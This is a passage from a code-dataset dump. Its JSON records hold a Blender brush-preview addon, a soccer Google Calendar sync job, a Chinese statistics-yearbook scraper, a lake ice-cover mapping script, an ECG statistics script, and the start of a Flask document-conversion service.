bpy.types.WindowManager.brush_previews = EnumProperty(items=brush_enum_items(), update=brush_changed)\r\n\r\n\r\ndef add_brushes():\r\n global preview_collection\r\n\r\n preview_collection = bpy.utils.previews.new()\r\n brushes = [brush for brush in bpy.data.brushes if brush.use_paint_sculpt]\r\n\r\n for brush in brushes:\r\n preview_collection.new(brush.name)\r\n\r\n\r\ndef brush_enum_items():\r\n global preview_collection\r\n\r\n enum_items = []\r\n\r\n for name, preview in preview_collection.items():\r\n enum_items.append((name, name, name, \"BRUSH_{}\".format(bpy.data.brushes[name].sculpt_tool if bpy.data.brushes[name].sculpt_tool != \"DRAW\" else \"SCULPT_DRAW\"), preview.icon_id))\r\n\r\n return enum_items\r\n\r\n\r\ndef brush_changed(self, context):\r\n wm = context.window_manager\r\n context.tool_settings.sculpt.brush = bpy.data.brushes[wm.brush_previews]\r\n\r\n\r\ndef register_and_load_brushes():\r\n global preview_collection\r\n\r\n add_brushes()\r\n\r\n bpy.types.WindowManager.brush_previews = EnumProperty(items=brush_enum_items(), update=brush_changed)\r\n\r\n\r\ndef unregister_and_unload_brushes():\r\n global preview_collection\r\n\r\n if preview_collection:\r\n bpy.utils.previews.remove(preview_collection)\r\n preview_collection = None\r\n", "sub_path": "All_In_One/addons/HOps/brush_previews.py", "file_name": "brush_previews.py", "file_ext": "py", "file_size_in_byte": 2122, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "bpy.app.handlers.persistent", "line_number": 8, "usage_type": "name"}, {"api_name": "bpy.context", "line_number": 21, "usage_type": "attribute"}, {"api_name": "bpy.context", "line_number": 22, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 27, "usage_type": "attribute"}, {"api_name": "bpy.utils.previews.remove", "line_number": 28, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 28, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 30, "usage_type": "attribute"}, {"api_name": "bpy.props.EnumProperty", "line_number": 30, "usage_type": "call"}, {"api_name": "bpy.app.handlers.persistent", "line_number": 16, "usage_type": "name"}, {"api_name": "bpy.utils.previews.new", "line_number": 36, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 36, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 37, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 49, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 56, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 64, "usage_type": "attribute"}, {"api_name": "bpy.props.EnumProperty", "line_number": 64, "usage_type": "call"}, {"api_name": "bpy.utils.previews.remove", "line_number": 71, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 71, "usage_type": "attribute"}]} +{"seq_id": "166268229", "text": "import datetime\nimport logging\nimport os\nimport pathlib\nimport pymongo\n\nfrom soccer.gcal.gcal import get_calendar_service, create_event, delete_event, get_past_events_id_list\nfrom soccer.pipelines import SoccerMongoDBPipeline\nfrom soccer.utils import get_end_time, datetime_object_to_str\n\n\nclass AllTeamsCalendarJob(object):\n APPLICATION_NAME_TUPLE = ('US National Teams Google Calendar', 'all-teams')\n APPLICATION_SCOPE = 'all'\n CALENDAR_ID = 'kpdvbqkv4bo726acao7v7v57io@group.calendar.google.com'\n\n def __init__(self):\n self.db = SoccerMongoDBPipeline()\n self.service = 
get_calendar_service(self.APPLICATION_NAME_TUPLE, self.APPLICATION_SCOPE)\n self.logger = logging.getLogger('AllTeamsCalendarJob')\n\n def run(self):\n self.delete_past_events()\n self.create_or_update_events()\n self.delete_old_html_and_json()\n\n def delete_past_events(self):\n for event_id in get_past_events_id_list(self.service, self.CALENDAR_ID):\n delete_event(self.service, self.CALENDAR_ID, event_id, logger=self.logger)\n\n def delete_replaced_events(self):\n replaced_events_gcal_id_list = set([x['gcal_id'] for x in self.db.collection.find({'status': 'replaced'})])\n for event_id in replaced_events_gcal_id_list:\n delete_event(self.service, self.CALENDAR_ID, event_id, logger=self.logger)\n\n def create_event_body(self, match):\n watch_list = match['watch_list'] if match['watch_list'] else []\n watch_url_list = match['watch_url_list'] if match['watch_url_list'] else []\n details_to_join = filter(None, [match['match_detail_url'],\n 'Watch:',\n ', '.join(watch_list),\n ', '.join(watch_url_list),\n 'Tickets:', match['ticket_info_url'],\n match['buy_tickets_url']])\n\n details = '\\n'.join(details_to_join)\n start_datetime = datetime_object_to_str(match['date_and_time'], '%Y-%m-%dT%H:%M:%S')\n # Google api doesn't accept 'Utc/Zulu'. Use Iceland's time which is Zulu time.\n event = {'summary': match['home_team'] + ' vs ' + match['opposing_team'],\n 'location': match['venue'],\n 'description': details,\n 'start': {'dateTime': start_datetime + '-00:00',\n 'timeZone': 'Atlantic/Reykjavik'},\n 'end': {'dateTime': get_end_time(start_datetime, date_format='%Y-%m-%dT%H:%M:%S') + '-00:00',\n 'timeZone': 'Atlantic/Reykjavik'},\n 'reminders': {'useDefault': True}\n }\n return event\n\n def create_or_update_events(self):\n all_matches = self.db.collection.find({\"status\": {\"$ne\": \"replaced\"}, \"date_and_time\": {\"$gte\": datetime.datetime.today()}})\n for match in all_matches:\n event_body = self.create_event_body(match)\n\n # If match has gcal_id, the event has already been created\n event_exists = dict(match).get('gcal_id')\n if event_exists:\n # Going with always update, seems easiest. 
No need to convert times etc\n # Not necessary now, but in the future, might want to check modified time on db and only update if\n # it's recent\n updated = self.service.events().update(calendarId=self.CALENDAR_ID,\n eventId=match['gcal_id'],\n body=event_body).execute()\n self.logger.info(\"{} updated\".format(updated['summary']))\n\n # if event doesnt exist, create one\n else:\n created = create_event(self.service, self.CALENDAR_ID, event_body)\n if created['status'] == 'confirmed':\n gcal_id = created['id']\n modified = datetime.datetime.utcnow()\n self.db.collection.find_one_and_update({'match_detail_url': match['match_detail_url']},\n {'$set': {'gcal_id': gcal_id, 'modified': modified}})\n self.logger.info(\"{} created and event_id saved.\".format(created['summary']))\n\n def clean_up_duplicate_events(self, delete_url_changes=True):\n # This might be something that is caused by derps in the script being run manually?\n event_id_set = set([x['id'] for x in self.service.events().list(calendarId=self.CALENDAR_ID).execute()['items']])\n cursor = self.db.collection.find()\n gcal_id_set = set(filter(None, [x.get('gcal_id') for x in cursor]))\n to_delete = event_id_set - gcal_id_set\n for event_id in to_delete:\n delete_event(self.service, self.CALENDAR_ID, event_id)\n if delete_url_changes:\n self.clean_up_duplicate_from_url_changes()\n\n def clean_up_duplicate_from_url_changes(self):\n # Sometimes the same match has their url changed after being posted.\n # This causes a problem because that url is used as unique key in the db.\n # We could use home_team-opp_team-date as unique key but this would create problem for past events since their date would be null\n # So, I will keep the duplicates in the db but clean them up here before being posted to gcal\n # just want to be safe and include one extra day\n collection = self.db.collection\n for match in self.db.collection.aggregate(\n [{'$group':\n {'_id': {'home': '$home_team', 'opp': '$opposing_team'},\n 'count': {'$sum': 1}}\n }]):\n if match['count'] > 1:\n home_team, opp_team = match['_id']['home'], match['_id']['opp']\n pivot = collection.find({'home_team': home_team, 'opposing_team': opp_team}).sort('created', pymongo.DESCENDING)[0]\n if not pivot['date_and_time']:\n # skip past events\n continue\n start = pivot['date_and_time'] - datetime.timedelta(days=1)\n end = pivot['date_and_time'] + datetime.timedelta(days=1)\n # get all having same home team n opp team.\n # If the dates are fairly close (within 24 hours), then get the last created n set the rest to have status = \"replaced\"\n collection.update({'home_team': home_team, 'opposing_team': opp_team,\n 'gcal_id': {'$ne': pivot['gcal_id']},\n 'date_and_time': {'$gte': start, '$lte': end}},\n {'$set': {'status': 'replaced'}}, multi=True)\n\n def delete_old_html_and_json(self):\n repo_dir = pathlib.Path(__file__).parents[2].__str__()\n html_dir = os.path.join(repo_dir, 'html_files')\n json_dir = os.path.join(repo_dir, 'items')\n last_month = datetime.datetime.today() - datetime.timedelta(days=30)\n for _, _, filelist in os.walk(html_dir):\n for f in filelist:\n fdate_string = f.split('_')[0]\n try:\n fdate = datetime.datetime.strptime(fdate_string, '%Y%m%d')\n except ValueError:\n continue\n if fdate < last_month:\n html_file = os.path.join(html_dir, f)\n json_file = os.path.join(json_dir, f.rsplit('_', 1)[0] + '.json')\n for x in (html_file, json_file):\n self._delete_file(x)\n\n def _delete_file(self, fpath):\n if os.path.isfile(fpath):\n os.remove(fpath)\n\n\nif __name__ == 
'__main__':\n AllTeamsCalendarJob().run()\n AllTeamsCalendarJob().clean_up_duplicate_events()\n # AllTeamsCalendarJob().delete_replaced_events()\n", "sub_path": "soccer/gcal/all_teams.py", "file_name": "all_teams.py", "file_ext": "py", "file_size_in_byte": 7881, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "soccer.pipelines.SoccerMongoDBPipeline", "line_number": 18, "usage_type": "call"}, {"api_name": "soccer.gcal.gcal.get_calendar_service", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 20, "usage_type": "call"}, {"api_name": "soccer.gcal.gcal.get_past_events_id_list", "line_number": 28, "usage_type": "call"}, {"api_name": "soccer.gcal.gcal.delete_event", "line_number": 29, "usage_type": "call"}, {"api_name": "soccer.gcal.gcal.delete_event", "line_number": 34, "usage_type": "call"}, {"api_name": "soccer.utils.datetime_object_to_str", "line_number": 47, "usage_type": "call"}, {"api_name": "soccer.utils.get_end_time", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 61, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 61, "usage_type": "attribute"}, {"api_name": "soccer.gcal.gcal.create_event", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 81, "usage_type": "attribute"}, {"api_name": "soccer.gcal.gcal.delete_event", "line_number": 93, "usage_type": "call"}, {"api_name": "pymongo.DESCENDING", "line_number": 111, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 115, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 116, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 128, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 128, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 128, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 129, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 133, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 133, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path", "line_number": 138, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 144, "usage_type": "call"}]} +{"seq_id": "580906518", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport urllib.request\nimport time\nimport csv\n\n\ndef get_request_years():\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'}\n page = 
requests.get(\"http://www.stats.gov.cn/tjsj/ndsj/\", headers = headers)\n\n    html = BeautifulSoup(page.content, 'html.parser')\n    table = html.find('table', 'ztzw_tab')\n    print(table)\n    links = table.findAll('a')\n    years_hrefs = []\n    for link in links:\n        years_hrefs.append(link['href'])\n\n    print(years_hrefs)\n    return years_hrefs\n\n\n\n\ndef get_data_for_year(year):\n    headers = {\n        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'}\n    left_link = re.sub('indexch', 'left', year)\n    base_link = re.sub('indexch.htm', '', year)\n    base_year = re.findall('\\\\d+', base_link)[0]\n    year_page = requests.get(left_link, headers=headers)\n    year_html = BeautifulSoup(year_page.content, 'html.parser')\n    if len(year_html.findAll('ul', {'id': 'foldinglist'})) != 0:\n        folding_lists = year_html.findAll('ul', {'id': 'foldinglist'})\n    else:\n        folding_lists = year_html.findAll('ul', {'id': re.compile('divOne_*')})\n\n\n    for folding_list in folding_lists:\n        li_lists = folding_list.findAll('li')\n\n        for li_list in li_lists:\n            file = li_list.find(\"a\").get('href')\n            name = li_list.find(\"a\").text.strip()\n            name = re.sub('\\\\W+', '', name)\n            print(file)\n\n            if '.jpg' in file:\n                retries = 3\n                success = False\n                while not success and retries >= 0:\n                    if retries == 0:\n                        raise Exception(\"download failed after retries (timed out)\")\n\n                    try:\n                        urllib.request.urlretrieve(base_link + file,\n                                                   'C:\\\\\\\\Users\\\\\\\\jocel\\\\\\\\OneDrive\\\\\\\\Desktop\\\\\\\\test\\\\\\\\' + base_year + name + '.jpg')\n                        success = True\n                    except Exception as e:\n                        wait = retries * 30\n                        time.sleep(wait)\n                        retries -= 1\n                        print(e)\n            elif '简要说明' in name: # skip the brief-introduction page\n                pass\n            elif '主要统计指标解释' in name: # skip the explanation-of-main-statistical-indicators page\n                pass\n            elif '.htm' in file:\n                retries = 3\n                success = False\n                while not success and retries >= 0:\n                    if retries == 0:\n                        raise Exception(\"download failed after retries (timed out)\")\n\n                    try:\n                        print(file)\n                        print(base_link)\n                        add = re.sub(r'\\\\.htm\\\\b', '.xls', base_link + file) # escape the dot so only a literal .htm suffix is rewritten to .xls\n                        print(add)\n                        urllib.request.urlretrieve(add,\n                                                   'C:\\\\\\\\Users\\\\\\\\jocel\\\\\\\\OneDrive\\\\\\\\Desktop\\\\\\\\test\\\\\\\\' + base_year + name + '.xls')\n\n                        success = True\n                    except Exception as e:\n                        wait = retries * 30\n                        time.sleep(wait)\n                        retries -= 1\n                        print(e)\n\n\n            else:\n                raise Exception(\"unhandled link type: \" + file)\n\ndef flow():\n    years_hrefs = get_request_years()\n    for year_href in years_hrefs:\n        print(year_href)\n        get_data_for_year(year_href)\n\n\n\nif __name__ == \"__main__\":\n    flow()\n", "sub_path": "get_stat_data.py", "file_name": "get_stat_data.py", "file_ext": "py", "file_size_in_byte": 3595, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 14, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 31, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 32, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 33, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 34, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 35, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 39, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 48, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 59, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 59, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 59, "usage_type": "name"}, {"api_name": 
"time.sleep", "line_number": 64, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 81, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 83, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 83, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 83, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 89, "usage_type": "call"}]} +{"seq_id": "322139505", "text": "import fiona\nimport numpy as np\nimport pandas as pd \nimport geopandas as gpd\nimport shapely\nfrom shapely.geometry import Point, Polygon\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nimport descartes\nfrom sklearn.linear_model import LogisticRegression\nimport geoplot as gplt\nimport geoplot.crs as gcrs\nimport joblib\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.model_selection import cross_val_score\nfrom imblearn.over_sampling import SMOTE\nfrom sklearn.feature_selection import RFE\nimport statsmodels.api as sm\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.impute import SimpleImputer\n\nRES_CONST = 0.25\npd.set_option('display.max_columns', None)\n\n\ninfile1 =\"https://pasta.lternet.edu/package/data/eml/edi/267/2/1c716f66bf3572a37a9f67035f9e02ac\".strip() \ninfile1 = infile1.replace(\"https://\",\"http://\")\n \ndt1 =pd.read_csv(infile1 \n ,skiprows=1\n ,sep=\",\" \n ,quotechar='\"' \n , names=[\n \"lakecode\", \n \"lakename\", \n \"continent\", \n \"country\", \n \"state\", \n \"IntermittentIceCover\", \n \"Latitude_dd\", \n \"Longitude_dd\", \n \"Elevation_m\", \n \"MeanAnnualAirTemp_c\", \n \"SurfaceArea_km2\", \n \"MeanDepth_m\", \n \"MaximumDepth_m\", \n \"Volume_mcm\", \n \"WatershedArea_km2\", \n \"ShorelineLength_km\", \n \"ResidenceTime_days\", \n \"MeanDischarge_m3_sec\", \n \"Slope_degrees\", \n \"ShorelineDevelopment\", \n \"JFMCloudCover_perc\", \n \"JFMPrecipitation_mm\", \n \"DistanceToCoast_km\", \n \"MaximumDistanceToLand_km\" ]\n )\n# Coerce the data into the types specified in the metadata \ndt1.lakecode=dt1.lakecode.astype('category') \ndt1.lakename=dt1.lakename.astype('category') \ndt1.continent=dt1.continent.astype('category') \ndt1.country=dt1.country.astype('category') \ndt1.state=dt1.state.astype('category') \ndt1.IntermittentIceCover=dt1.IntermittentIceCover.astype('category') \ndt1.Latitude_dd=pd.to_numeric(dt1.Latitude_dd,errors='coerce') \ndt1.Longitude_dd=pd.to_numeric(dt1.Longitude_dd,errors='coerce') \ndt1.Elevation_m=pd.to_numeric(dt1.Elevation_m,errors='coerce') \ndt1.MeanAnnualAirTemp_c=pd.to_numeric(dt1.MeanAnnualAirTemp_c,errors='coerce') \ndt1.SurfaceArea_km2=pd.to_numeric(dt1.SurfaceArea_km2,errors='coerce') \ndt1.MeanDepth_m=pd.to_numeric(dt1.MeanDepth_m,errors='coerce') \ndt1.MaximumDepth_m=pd.to_numeric(dt1.MaximumDepth_m,errors='coerce') \ndt1.Volume_mcm=pd.to_numeric(dt1.Volume_mcm,errors='coerce') \ndt1.WatershedArea_km2=pd.to_numeric(dt1.WatershedArea_km2,errors='coerce') \ndt1.ShorelineLength_km=pd.to_numeric(dt1.ShorelineLength_km,errors='coerce') \ndt1.ResidenceTime_days=pd.to_numeric(dt1.ResidenceTime_days,errors='coerce') \ndt1.MeanDischarge_m3_sec=pd.to_numeric(dt1.MeanDischarge_m3_sec,errors='coerce') \ndt1.Slope_degrees=pd.to_numeric(dt1.Slope_degrees,errors='coerce') \ndt1.ShorelineDevelopment=pd.to_numeric(dt1.ShorelineDevelopment,errors='coerce') 
\ndt1.JFMCloudCover_perc=pd.to_numeric(dt1.JFMCloudCover_perc,errors='coerce') \ndt1.JFMPrecipitation_mm=pd.to_numeric(dt1.JFMPrecipitation_mm,errors='coerce') \ndt1.DistanceToCoast_km=pd.to_numeric(dt1.DistanceToCoast_km,errors='coerce') \ndt1.MaximumDistanceToLand_km=pd.to_numeric(dt1.MaximumDistanceToLand_km,errors='coerce') \n\ndt = dt1.filter(['Latitude_dd', 'Longitude_dd', 'IntermittentIceCover'])\ndt['IntermittentIceCover'] = dt['IntermittentIceCover'].map({'Y': 1, 'N': 0})\n\ndt = gpd.GeoDataFrame(dt, geometry = gpd.points_from_xy(dt.Longitude_dd, dt.Latitude_dd))\n\nannualLakes= dt[dt['IntermittentIceCover']==0]\nprint(annualLakes.shape)\nintermittentLakes= dt[dt['IntermittentIceCover']==1]\nprint(intermittentLakes.shape)\n\nworld = gpd.read_file(gpd.datasets.get_path('naturalearth_lowres'))\n\nax = gplt.polyplot(world, projection=gplt.crs.NorthPolarStereo(), facecolor='whitesmoke', figsize = (15, 15))\n\ngplt.pointplot(annualLakes, color = 'black', ax = ax, s = 10, label = 'Annual winter ice')\ngplt.pointplot(intermittentLakes, color = 'tab:orange', ax = ax, s = 10, label = 'Intermittent winter ice')\nlgnd = plt.legend(loc=\"lower left\", scatterpoints=1, fontsize=18)\nlgnd.legendHandles[0]._sizes = [100]\nlgnd.legendHandles[1]._sizes = [100]\nplt.savefig('trainingLakeMap.png', bbox_inches='tight')\nplt.clf()\n", "sub_path": "trainingMap.py", "file_name": "trainingMap.py", "file_ext": "py", "file_size_in_byte": 4823, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.set_option", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 69, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 72, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 75, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 76, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 78, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 79, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 80, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 81, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 82, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 83, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 84, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 85, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 90, "usage_type": "call"}, {"api_name": "geopandas.points_from_xy", "line_number": 90, "usage_type": "call"}, {"api_name": "geopandas.read_file", "line_number": 97, "usage_type": "call"}, {"api_name": "geopandas.datasets.get_path", "line_number": 97, "usage_type": "call"}, {"api_name": "geopandas.datasets", "line_number": 97, "usage_type": "attribute"}, {"api_name": "geoplot.polyplot", "line_number": 99, "usage_type": 
"call"}, {"api_name": "geoplot.crs.NorthPolarStereo", "line_number": 99, "usage_type": "call"}, {"api_name": "geoplot.crs", "line_number": 99, "usage_type": "attribute"}, {"api_name": "geoplot.pointplot", "line_number": 101, "usage_type": "call"}, {"api_name": "geoplot.pointplot", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}]} +{"seq_id": "191366773", "text": "import os\nfrom configparser import ConfigParser\n\nimport pandas as pd\nfrom ecgpandas.loader import Loader\n\n\ndef statistics(statements, original_statements, lookup):\n print(\"With multi and modifiers\")\n added_and_removed(original_statements, statements)\n\n print(\"With multi and no modifiers\")\n statement_types = lookup.rename(columns={'TopLvlFolder': 'Group'}).Type.to_frame()\n statements = pd.merge(statements, statement_types, left_on='Statement', right_index=True)\n original_statements = pd.merge(original_statements, statement_types, left_on='Statement', right_index=True)\n\n statements = statements.loc[statements.Type == 2]\n original_statements = original_statements.loc[original_statements.Type == 2]\n\n statements.drop('Type', axis=1, inplace=True)\n original_statements.drop('Type', axis=1, inplace=True)\n\n added_and_removed(original_statements, statements)\n\n print(\"No multi and no modifiers\")\n statements = statements.groupby(['PatientID', 'Date'], group_keys=False).filter(lambda g: len(g) == 1)\n original_statements = original_statements.groupby(['PatientID', 'Date'], group_keys=False).filter(lambda g: len(g) == 1)\n\n added_and_removed(original_statements, statements)\n\n print(\"Most important, our data set\")\n iterative_count_differences(original_statements, statements)\n\n\ndef iterative_count_differences(original, statements):\n original.set_index(['PatientID', 'Date'], inplace=True)\n statements.set_index(['PatientID', 'Date'], inplace=True)\n\n original.drop('index', axis=1, inplace=True)\n statements.drop('index', axis=1, inplace=True)\n\n\n original_dict = original.squeeze().to_dict()\n statement_dict = statements.squeeze().to_dict()\n\n total = statements.shape[0]\n changed = 0\n\n for idx in statement_dict.keys():\n if idx in original_dict:\n if statement_dict[idx] != original_dict[idx]:\n changed += 1\n\n\n print(\"Ratio changed records by doctors {}\".format(changed/total))\n\n\ndef added_and_removed(original_statements, statements):\n statements.reset_index(inplace=True)\n original_statements.reset_index(inplace=True)\n records_with_added = statements.merge(original_statements.drop_duplicates(), on=['PatientID', 'Date', 'Statement'],\n how='left', indicator=True)\n records_with_added = records_with_added.loc[records_with_added._merge == 'left_only']\n records_with_added.set_index(['PatientID', 'Date'], inplace=True)\n number_with_added = records_with_added.index.unique().shape[0]\n ratio_records_with_added_statements = number_with_added / statements.index.unique().shape[0]\n print(\"Ratio changed records with added statments by doctors {}\".format(ratio_records_with_added_statements))\n records_with_removed = 
statements.merge(original_statements.drop_duplicates(),\n                                                      on=['PatientID', 'Date', 'Statement'], how='right', indicator=True)\n    records_with_removed = records_with_removed.loc[records_with_removed._merge == 'right_only']\n    records_with_removed.set_index(['PatientID', 'Date'], inplace=True)\n    number_with_removed = records_with_removed.index.unique().shape[0]\n    ratio_records_with_removed_statements = number_with_removed / statements.index.unique().shape[0]\n    print(\"Ratio changed records with removed statments by doctors {}\".format(ratio_records_with_removed_statements))\n\n\ndef smart_stats(original, statements):\n    pass\n\ndef main():\n    config_parser = ConfigParser(allow_no_value=True)\n    config_parser.read(\"../local.conf\")\n\n    path = config_parser.get('Default', 'Path')\n\n    statements_path = os.path.join(os.path.sep, path, \"SW10\", \"Parsed\", \"with_modifiers\", \"statement.csv\")\n    original_statements_path = os.path.join(os.path.sep, path, \"SW10\", \"Parsed\", \"with_modifiers\",\n                                             \"original_statement.csv\")\n\n    print(\"Loading statements and machine generated statements\")\n    statements = pd.read_csv(statements_path)\n    original = pd.read_csv(original_statements_path)\n\n    statements.set_index([\"PatientID\", \"Date\"], inplace=True)\n    original.set_index([\"PatientID\", \"Date\"], inplace=True)\n\n    lookup = Loader(path).load_statement_lookup()\n\n    statement_types = lookup.rename(columns={'TopLvlFolder': 'Group'}).Type.to_frame()\n    statements = pd.merge(statements, statement_types, left_on='Statement', right_index=True)\n    original = pd.merge(original, statement_types, left_on='Statement', right_index=True)\n\n    smart_stats(original, statements)\n\n    # statistics(statements, original_statements, lookup)\n\n\nif __name__ == '__main__':\n    main()\n", "sub_path": "statistics/original_vs_newdiagnoses.py", "file_name": "original_vs_newdiagnoses.py", "file_ext": "py", "file_size_in_byte": 4657, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.merge", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 15, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 91, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 92, "usage_type": "call"}, {"api_name": "ecgpandas.loader.Loader", "line_number": 97, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 101, "usage_type": "call"}]}
+{"seq_id": "505005378", "text": "import os\nimport logging\nimport traceback\nfrom threading import RLock\nfrom flask import Flask, request, send_file\nfrom tempfile import mkstemp\nfrom werkzeug.wsgi import ClosingIterator\nfrom werkzeug.exceptions import HTTPException\nfrom pantomime import FileName, normalize_mimetype, mimetype_extension\n\nfrom convert.converter import Converter, ConversionFailure\nfrom convert.formats import load_mime_extensions\nfrom .document_types import *\n\nlogging.basicConfig(level=logging.DEBUG)\nlog = logging.getLogger('convert')\nlock = RLock()\nextensions = load_mime_extensions()\nconverter = Converter()\n\n\nclass ShutdownMiddleware:\n    def __init__(self, application):\n        self.application = application\n\n    def post_request(self):\n        if app.is_dead:\n            os._exit(127)\n\n    def __call__(self, environ, after_response):\n        iterator = self.application(environ, after_response)\n        try:\n            return ClosingIterator(iterator, [self.post_request])\n        except Exception:\n            traceback.print_exc()\n        return iterator\n\n\napp = Flask(\"convert\")\napp.is_dead = False\napp.wsgi_app = ShutdownMiddleware(app.wsgi_app)\n\n\n@app.route(\"/\")\ndef info():\n    if app.is_dead:\n        return (\"BUSY\", 503)\n    return (\"OK\", 200)\n\n\n@app.route(\"/convert\", methods=['POST'])\ndef convert():\n    acquired = lock.acquire(timeout=1)\n    if app.is_dead or not acquired:\n        return (\"BUSY\", 503)\n    timeout = int(request.args.get('timeout', 1000))\n    upload_file = None\n    output_format = request.form.get('format')\n    if not output_format in 